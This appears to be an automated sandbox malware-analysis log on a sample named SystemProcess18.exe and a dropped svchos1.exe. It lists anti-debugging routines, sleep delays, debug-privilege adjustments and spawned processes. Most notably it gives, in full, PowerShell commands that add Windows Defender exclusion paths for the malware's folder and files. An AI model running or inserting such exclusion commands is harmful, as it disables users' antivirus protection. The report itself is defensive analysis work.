Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03089090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	29_2_03089090
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030897D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	29_2_030897D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03089B60 FindFirstFileA,FindClose,FindClose,	29_2_03089B60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0308BD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	29_2_0308BD60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03089C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,	29_2_03089C40

Source: C:\Users\Public\Documents\MM\svchos1.exe

28_2_035C8E60

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035DB360 Sleep,GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLastInputInfo,GetTickCount,_access,lstrcpy,

28_2_035DB360

Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 111000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 103000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 31000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 88000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 142000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 35000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 109000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 106000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 130000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 82000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 34000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 102000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 33000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 144000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 32000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 93000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 101000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 143000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 146000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 118000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 131000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 89000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 125000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 140000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 81000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 132000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 116000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 112000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 80000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 110000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 123000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 149000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 114000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 107000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 90000	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Thread delayed: delay time: 115000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: SystemProcess18.exe, 00000000.00000003.1877734457.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.1878106626.0000000000F0B000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.2495372253.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.2606394143.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.2938109988.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.2816405961.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWm
Source: SystemProcess18.exe, 00000000.00000003.1877734457.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.1878106626.0000000000F0B000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.2495145201.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1490622674.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1707154787.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1596189606.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1644579055.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1497498025.0000000000971000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\Public\Documents\MM\svchos1.exe	API call chain: ExitProcess graph end node			graph_28-104363
Source: C:\Users\Public\Documents\MM\svchos1.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\SystemProcess18.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\Public\Documents\MM\svchos1.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035D7530 BlockInput,BlockInput,BlockInput,

28_2_035D7530

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_007B804D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

28_2_007B804D

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035E1A50 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Sleep,

28_2_035E1A50

Source: C:\Users\Public\Documents\MM\svchos1.exe

28_2_007C24A8

Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DE0031 mov eax, dword ptr fs:[00000030h]	0_3_03DE0031
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03480031 mov eax, dword ptr fs:[00000030h]	28_2_03480031
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03A70031 mov eax, dword ptr fs:[00000030h]	28_2_03A70031
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_00980031 mov eax, dword ptr fs:[00000030h]	29_2_00980031
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_02980031 mov eax, dword ptr fs:[00000030h]	29_2_02980031

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035CA590 LocalAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlen,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,GetProcessHeap,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,wsprintfA,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,GetProcessHeap,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlen,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,htons,inet_ntoa,wsprintfA,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseHandle,LocalFree,LocalFree,LocalFree,FreeLibrary,LocalReAlloc,

28_2_035CA590

Source: C:\Users\user\Desktop\SystemProcess18.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process token adjusted: Debug
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007B804D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_007B804D
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007B1103 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	28_2_007B1103
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007B804D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_007B804D
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007B1103 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_007B1103
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0104B13E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_0104B13E
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0104342A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_0104342A
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_01042F35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_01042F35

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035E13B0 ShellExecuteEx,_access,Sleep,CreateFileA,GetFileSize,MessageBoxA,VirtualAlloc,MessageBoxA,ReadFile,CloseHandle,VirtualFree,MessageBoxA,VirtualFree,CloseHandle,

28_2_035E13B0

Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
